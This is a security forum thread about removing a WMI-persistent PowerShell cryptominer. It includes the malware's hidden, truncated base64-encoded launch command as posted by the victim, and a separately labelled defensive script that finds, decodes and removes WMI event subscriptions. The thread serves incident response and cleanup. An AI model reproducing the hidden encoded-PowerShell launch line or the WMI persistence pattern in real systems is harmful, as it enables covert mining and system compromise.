randomguy, posted February 7, 2018

Hi All,

First of all, I believe we have a similar issue to the below:

PowerShell Script - Possible Malicious Attack, by Marco2526, November 2, 2017, in Malware Finding and Cleaning
https://forum.eset.com/topic/13651-powershell-script-possible-malicious-attack/

A PowerShell script is run every hour or so (I can forcefully close it to stop the attack, but it will start back up). I found the below in the WMI tab of Sysinternals Autoruns. Symantec is constantly reporting the message below while the script is running:

[SID: 30253] system infected: bitcoinminer Activity 6 detected.

Can anyone please provide assistance?

DSM Event Log Consumer
%SystemRoot%\system32\WindowsPowerShell\v1.0\PowerShell.exe
powershell.exe -NoP -NonI -W Hidden -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAANAAoAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAO....... (there is a huge amount of text that continues here)

Kind Regards
itman, posted February 7, 2018 (edited February 7, 2018 by itman)

-EDIT- Before doing the below, open up Process Explorer/Task Manager and let me know if powershell.exe is running as a child process under wmiprvse.exe.

Disable the WMI consumer event in Autoruns as follows:

Quote:
WMI
The WMI tab lists registered WMI event consumers that can be configured to run arbitrary scripts or command lines when a particular event occurs. When you select an entry on the WMI tab, the lower panel reports information about the target file, the event consumer's full command line, and the condition, such as a WQL query, that will trigger the event consumer to execute. When you disable a WMI entry, Autoruns replaces the entry with a clone that has the same name but with "_disabled" appended. This breaks the binding to the event filter so that it won't execute. By re-enabling, the original name and the event binding is reestablished. These events and bindings are stored in the WMI repository in the ROOT\subscription namespace.
https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2

If there are no adverse effects from the above and this stops the activity, you can remove the consumer event.

You mention Symantec in your posting. Are you using an Eset product?
JamesR (ESET Staff), posted February 7, 2018 (edited March 2, 2018 by JamesR: updated steps to point to latest WMILister)

@randomguy

1. Please download and generate an ELC log from here: https://www.eset.com/int/support/log-collector/

2. Also, please try this newer version of WMILister v3.0 on the server. Please supply any logs generated by this and by ELC in a reply on the ESET Forums. If any odd scripts are found, you will be prompted whether you want to remove them. It is best to review the log, which will be saved inside a Log folder in the same folder the utility was run from.
https://eset.sharefile.com/d-sb6232c1bc5240709

Run this command as admin (logs will be generated in the same folder as the tool and saved inside a Logs folder):

cscript //nologo WMILister_30.vbs

If scripts are found, you will be prompted to remove them.

3. Reboot after stating "y" to the prompt for cleaning.

To see advanced usage of this tool, please see this post:

This log will also let me know if it is indeed a WMI persistent threat. Since Autoruns flagged WMI, it likely is using WMI persistence and, if I remember correctly, Autoruns doesn't properly disable WMI scripting (I could be wrong on this and I am not near a test environment).

Regards,
JamesR
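The three posts above all turn on the same object: the filter-to-consumer binding in ROOT\subscription that the Autoruns WMI tab displays and WMILister removes. The PowerShell below is an added example, not code from this thread, from Autoruns or from ESET's WMILister. It enumerates those bindings, decodes a `-E` argument of the kind randomguy pasted (the blob is base64 over the UTF-16LE bytes of the script, which is why it starts with `JAB`, a `$` followed by a NUL byte), answers itman's question about powershell.exe running under wmiprvse.exe, and deletes a subscription only when run with `-Remove` and after a y/N prompt. It assumes Windows PowerShell 3.0 or later running elevated and uses only Get-WmiObject/Remove-WmiObject; the function names and the `-Remove` behaviour are mine, not WMILister's.

```powershell
#Requires -RunAsAdministrator
# Added example: not code from this thread, from Autoruns, or from ESET's WMILister.
# Lists every filter -> consumer binding in ROOT\subscription (the namespace the
# Autoruns WMI tab reads), decodes a powershell -E/-EncodedCommand payload when a
# consumer carries one, lists powershell.exe processes whose parent is wmiprvse.exe,
# and with -Remove deletes a subscription after a y/N prompt.
[CmdletBinding()]
param([switch]$Remove)

$ns = 'root\subscription'

function ConvertFrom-EncodedCommand {
    # -E / -EncodedCommand is base64 over the UTF-16LE bytes of the script.
    param([string]$CommandLine)
    if (-not $CommandLine) { return $null }
    # powershell.exe accepts -e, -ec, -en, -enc ... -encodedcommand; the pattern
    # "-e(?:c|n[a-z]*)?" takes those but not -ExecutionPolicy.
    $m = [regex]::Match($CommandLine, '(?i)\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)')
    if (-not $m.Success) { return $null }
    try {
        [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value))
    } catch [FormatException] {
        # The post truncates the blob; a partial base64 string does not decode.
        '<base64 truncated or invalid; copy the full -E argument from Autoruns>'
    }
}

function Get-WmiSubscription {
    $filters   = @(Get-WmiObject -Namespace $ns -Class __EventFilter)
    $consumers = @(Get-WmiObject -Namespace $ns -Class __EventConsumer)  # base class: every consumer type
    foreach ($b in Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding) {
        # Reference properties arrive as relative paths such as __EventFilter.Name="x"
        $filterName = if ($b.Filter   -match '^\w+\.Name="(.*)"$')   { $Matches[1] }
        $consClass  = if ($b.Consumer -match '^(\w+)\.Name="(.*)"$') { $Matches[1] }
        $consName   = $Matches[2]
        $filter   = $filters   | Where-Object { $_.Name -eq $filterName }
        $consumer = $consumers | Where-Object { $_.__CLASS -eq $consClass -and $_.Name -eq $consName }
        # CommandLineEventConsumer runs CommandLineTemplate; ActiveScriptEventConsumer runs ScriptText
        $payload = if ($consumer.CommandLineTemplate) { $consumer.CommandLineTemplate }
                   elseif ($consumer.ScriptText)      { $consumer.ScriptText } else { $null }
        [pscustomobject]@{
            Filter        = $filterName
            Query         = $filter.Query
            ConsumerClass = $consClass
            Consumer      = $consName
            Payload       = $payload
            Decoded       = ConvertFrom-EncodedCommand $payload
            Binding       = $b
            FilterObj     = $filter
            ConsumerObj   = $consumer
        }
    }
}

function Get-WmiSpawnedPowerShell {
    # itman's first check: is powershell.exe a child of wmiprvse.exe, the WMI provider
    # host that launches CommandLineEventConsumer payloads?
    $procs = @(Get-WmiObject Win32_Process)
    $byId = @{}
    foreach ($p in $procs) { $byId[[int]$p.ProcessId] = $p }
    foreach ($p in $procs) {
        $parent = $byId[[int]$p.ParentProcessId]
        if ($p.Name -eq 'powershell.exe' -and $parent -and $parent.Name -eq 'wmiprvse.exe') { $p }
    }
}

$subs = @(Get-WmiSubscription)
Write-Host "WMI subscriptions in $ns ($($subs.Count)):"
$subs | Format-List Filter, Query, ConsumerClass, Consumer, Payload, Decoded | Out-String | Write-Host

Write-Host "powershell.exe processes whose parent is wmiprvse.exe:"
Get-WmiSpawnedPowerShell | Format-List ProcessId, ParentProcessId, CommandLine | Out-String | Write-Host

# Windows ships a legitimate "SCM Event Log Consumer" (NTEventLogEventConsumer) in this
# namespace; the OP's "DSM Event Log Consumer" copies that naming but runs powershell.exe,
# so judge each entry by its payload, not its name. Deleting the binding alone stops
# execution; the filter is deleted only if no other listed binding still references it.
if ($Remove) {
    foreach ($s in $subs) {
        if ((Read-Host "Delete '$($s.Filter)' -> '$($s.Consumer)'? [y/N]") -ne 'y') { continue }
        $s.Binding     | Remove-WmiObject
        $s.ConsumerObj | Remove-WmiObject
        $shared = $subs | Where-Object { $_ -ne $s -and $_.Filter -eq $s.Filter }
        if (-not $shared) { $s.FilterObj | Remove-WmiObject }
    }
}
```

Run it once without `-Remove` to read the decoded payload and the WQL query (a miner's filter is typically a timer or a `__InstanceModificationEvent` on `Win32_PerfFormattedData_PerfOS_System`, which is what gives the hourly re-launch the OP describes); only then run it with `-Remove`. Removing the subscription stops the re-launch, but it does not remove the dropped script or any other persistence, so the ELC log JamesR asks for is still needed.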
itman, posted February 8, 2018 (edited February 8, 2018 by itman)

I will also add that, based on the PowerShell command execution being deployed, it is likely you may have been nailed by Monero WannaMine: https://www.pandasecurity.com/mediacenter/pandalabs/threat-hunting-fileless-attacks/ . Are your OS patches up to date, especially in regard to the EternalBlue NSA exploit?